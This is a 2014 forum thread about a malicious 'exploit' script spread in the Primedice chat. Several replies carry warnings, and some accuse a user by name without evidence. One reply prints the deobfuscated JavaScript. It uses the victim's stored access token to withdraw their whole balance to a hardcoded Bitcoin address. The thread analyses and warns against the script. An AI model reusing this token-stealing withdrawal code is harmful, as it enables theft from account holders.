keithers
Legendary
Offline
Activity: 1456
Merit: 1001
This is the land of wolves now & you're not a wolf
|
|
September 21, 2014, 03:58:01 AM |
|
What in the hell is going on with the Chatbox right now?! Look what keeps scrolling down the whole page?
|
|
|
|
ttman
|
|
September 21, 2014, 04:02:00 AM |
|
yesterday theres a user ( never notice his/her username in the chat ) did say something of the Exploit thing going on in the next 24hrs if Stunna never get back to him/her . i wonder is it regarding this matter
|
|
|
|
williamj2543
|
|
September 21, 2014, 04:12:35 AM |
|
Spoderman for mod! Thanks for sharing this with us m8!
|
██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████
|
|
|
Ejaculation
|
|
September 21, 2014, 04:13:38 AM |
|
Spoderman for mod! Thanks for sharing this with us m8!
Yeah, Spoderman should be mod!
|
▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄ ASICMINERPRISMA 1.4T+ ● 0.70-0.78J/GH ● ONLY 1.39BTC Shipping in Oct. ▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀
|
|
|
StopGG
Newbie
Offline
Activity: 17
Merit: 0
|
|
September 21, 2014, 04:16:20 AM |
|
What is the Mute command? ill start to mute this guy
|
|
|
|
lightlord
Donator
Legendary
Offline
Activity: 3228
Merit: 1226
★Bitvest.io★ Play Plinko or Invest!
|
|
September 21, 2014, 04:17:41 AM |
|
Seems PD chat, has gone a bit crazy.
|
|
|
|
Anony
Sr. Member
Offline
Activity: 308
Merit: 250
Invest & Earn: https://cloudthink.io
|
|
September 21, 2014, 04:21:42 AM |
|
What is the Mute command? ill start to mute this guy
1. You have to a mod to mute 2. There are tens or hundreds of accounts with different combos posting There is no way to stop this guy unless chat is turned off, he's most likely also using proxy lists on each acct so I personally don't think he'll be stopped anytime soon. Plus it seems he has disabled mute command for mods, can't mute anyone at all at the moment.
|
|
|
|
StopGG
Newbie
Offline
Activity: 17
Merit: 0
|
|
September 21, 2014, 04:26:08 AM |
|
No, i think chat is bugged and the server can't read your messages.
|
|
|
|
AmazingMonkey265
Newbie
Offline
Activity: 6
Merit: 0
|
|
September 21, 2014, 04:37:38 AM |
|
This is messed some is being a total meanie!! Oh well I guess you guys will be busy for awhile. Its pretty messed up you cant mute atm.
|
|
|
|
michietn94
Legendary
Offline
Activity: 1274
Merit: 1001
|
|
September 21, 2014, 04:41:18 AM |
|
what is the purpose he's doing that ? For leveling up ? or just want to disturb PD chat ?
Hope nothing will loss after the incident and can be fix, ASAP
|
.. FANSUNITE | █ █ ███ ███ ███ ▄ ▀ ███ ███ ███ ███ █ █ | | █ █ ███ ███ ███ ▄ ▀ ███ ███ ███ ███ █ █ | |
|
|
|
Brah
Newbie
Offline
Activity: 42
Merit: 0
|
|
September 21, 2014, 04:47:08 AM |
|
Lol, Like I said in Chat a few days ago, if you're stupid enough to try any script/bot you deserve whatever happens.
|
|
|
|
nahtnam
Legendary
Offline
Activity: 1092
Merit: 1000
nahtnam.com
|
|
September 21, 2014, 05:05:47 AM |
|
Dont use code you cant read.
|
|
|
|
Stunna (OP)
Legendary
Offline
Activity: 3192
Merit: 1279
Primedice.com, Stake.com
|
|
September 21, 2014, 05:13:43 AM |
|
Set some restrictions on chat, obviously don't run untrusted code in your browser.
|
|
|
|
Anony
Sr. Member
Offline
Activity: 308
Merit: 250
Invest & Earn: https://cloudthink.io
|
|
September 21, 2014, 05:22:56 AM |
|
Set some restrictions on chat, obviously don't run untrusted code in your browser.
Take a look at my post it's clear who it is. Are you going to investigate the issue or end it at leaving restrictions? I lost coins on my alt but not going to ask for any compensation since It was my own fault hit I want to see justice done to the culprit both scripts were wrote in java, other than that there is no clear similarities in the two. How are you so certain it was mdma anyway? And yes, losing your balance was your fault for trying to abuse an exploit. Even if you wanted to recover your losses, doubt Stunna would pay back someone who was trying to scam him in the first place.
|
|
|
|
Anony
Sr. Member
Offline
Activity: 308
Merit: 250
Invest & Earn: https://cloudthink.io
|
|
September 21, 2014, 05:42:24 AM |
|
Set some restrictions on chat, obviously don't run untrusted code in your browser.
Take a look at my post it's clear who it is. Are you going to investigate the issue or end it at leaving restrictions? I lost coins on my alt but not going to ask for any compensation since It was my own fault hit I want to see justice done to the culprit both scripts were wrote in java, other than that there is no clear similarities in the two. How are you so certain it was mdma anyway? And yes, losing your balance was your fault for trying to abuse an exploit. Even if you wanted to recover your losses, doubt Stunna would pay back someone who was trying to scam him in the first place. I did not plan on exploiting I planned on reporting it if it worked, in fact, it didn't. I knew it wouldn't as it isn't possible for something like this to be made. Have a look closely at both bots, also how did this user get access to the API to do what he did, only staff have access as far as I am concerned? Also someone please decrypt the address in the malicious code and post it, I'll analyse where this money is going to Come ask him, he's in chat right now explaining how he did everything. Pretty interesting.
|
|
|
|
waterpile
|
|
September 21, 2014, 06:02:26 AM |
|
Its his fault for falling such cheap tricks, don't click links that are suspicious or untrusted
|
|
|
|
dooglus
Legendary
Offline
Activity: 2940
Merit: 1333
|
|
September 21, 2014, 06:30:44 AM Last edit: September 21, 2014, 06:42:36 AM by dooglus |
|
Wtf I just tried it and .4 BTC disappeared out of my accoun?
I tried decoding the 'exploit'. I got this far: calculate_nonce = function(seed) { return 'https://api.primedice.com/api/' + seed + '?access_token=' + localStorage['token']; };
lut = window['$'];
lut['getJSON']( calculate_nonce('users/1'), function(seed) { var key1 = 'amount' var key2 = 'address' var load = {}; load[key1] = seed['user']['balance']; load[key2] = '1UKZqhqW9QfNjEaSBTMqZhX4TWoHG51ju'; lut['post'](calculate_nonce('withdraw'), load); } ); I guess it's using the API to get your balance and withdraw it to address 1UKZqhqW9QfNjEaSBTMqZhX4TWoHG51ju. Probably best not to run it... Edit: Wtf I just tried it and .4 BTC disappeared out of my accoun?
If you check the address your balance gets send to, you'll see the total haul is only 0.03 BTC. It doesn't look like anyone lost 0.4 BTC from their accoun unless you ran a different version of the hack with a different destination address.
|
Just-Dice | ██ ██████████ ██████████████████ ██████████████████████████ ██████████████████████████████ ██████████████████████████████ ██████████████████████████████ ██████████████████████████████ ██████████████████████████████ ██████████████████████████████ ██████████████████████████████ ██████████████████████████████ ██████████████████████████████ ██████████████████████ ██████████████ ██████ | Play or Invest | ██ ██████████ ██████████████████ ██████████████████████████ ██████████████████████████████ ██████████████████████████████ ██████████████████████████████ ██████████████████████████████ ██████████████████████████████ ██████████████████████████████ ██████████████████████████████ ██████████████████████████████ ██████████████████████████████ ██████████████████████ ██████████████ ██████ | 1% House Edge |
|
|
|
Anony
Sr. Member
Offline
Activity: 308
Merit: 250
Invest & Earn: https://cloudthink.io
|
|
September 21, 2014, 07:45:20 AM |
|
Wtf I just tried it and .4 BTC disappeared out of my accoun?
I tried decoding the 'exploit'. I got this far: calculate_nonce = function(seed) { return 'https://api.primedice.com/api/' + seed + '?access_token=' + localStorage['token']; };
lut = window['$'];
lut['getJSON']( calculate_nonce('users/1'), function(seed) { var key1 = 'amount' var key2 = 'address' var load = {}; load[key1] = seed['user']['balance']; load[key2] = '1UKZqhqW9QfNjEaSBTMqZhX4TWoHG51ju'; lut['post'](calculate_nonce('withdraw'), load); } ); I guess it's using the API to get your balance and withdraw it to address 1UKZqhqW9QfNjEaSBTMqZhX4TWoHG51ju. Probably best not to run it... Edit: Wtf I just tried it and .4 BTC disappeared out of my accoun?
If you check the address your balance gets send to, you'll see the total haul is only 0.03 BTC. It doesn't look like anyone lost 0.4 BTC from their accoun unless you ran a different version of the hack with a different destination address. there were actually 2 different scripts being posted, one withdrawing to the address you mentioned above, and the other to 19Nft7skg4RdH7P43XYcCSYRzZwQiTy6PE which collected ~0.3btc
|
|
|
|
WhatTheGox
Legendary
Offline
Activity: 812
Merit: 1000
|
|
September 21, 2014, 08:24:39 AM |
|
don't click links that are suspicious or untrusted
+1 dont ever click strange links, sometimes its tricky though i fell for one once at BTC-e which was cleverly disguised to mimic a bitcointalk.org link.
|
|
|
|
DiamondCardz
Legendary
Offline
Activity: 1134
Merit: 1118
|
|
September 21, 2014, 08:45:35 AM |
|
What is the Mute command? ill start to mute this guy
1. You have to a mod to mute 2. There are tens or hundreds of accounts with different combos posting There is no way to stop this guy unless chat is turned off, he's most likely also using proxy lists on each acct so I personally don't think he'll be stopped anytime soon. Plus it seems he has disabled mute command for mods, can't mute anyone at all at the moment. Put this in my original post...This is DEFINITELY MDMA Prove it. Until you prove it you have no basis to make accusations like this. "He is good at coding" is not proof. I'm good at coding, does that mean I am now the person who stole everyone's BTC? I don't know if anything happened to mdma that I'm not aware of (i.e. he was demoted from Mod or something like that), but until I know the situation, I have to call you out there.
|
BA Computer Science, University of Oxford Dissertation was about threat modelling on distributed ledgers.
|
|
|
|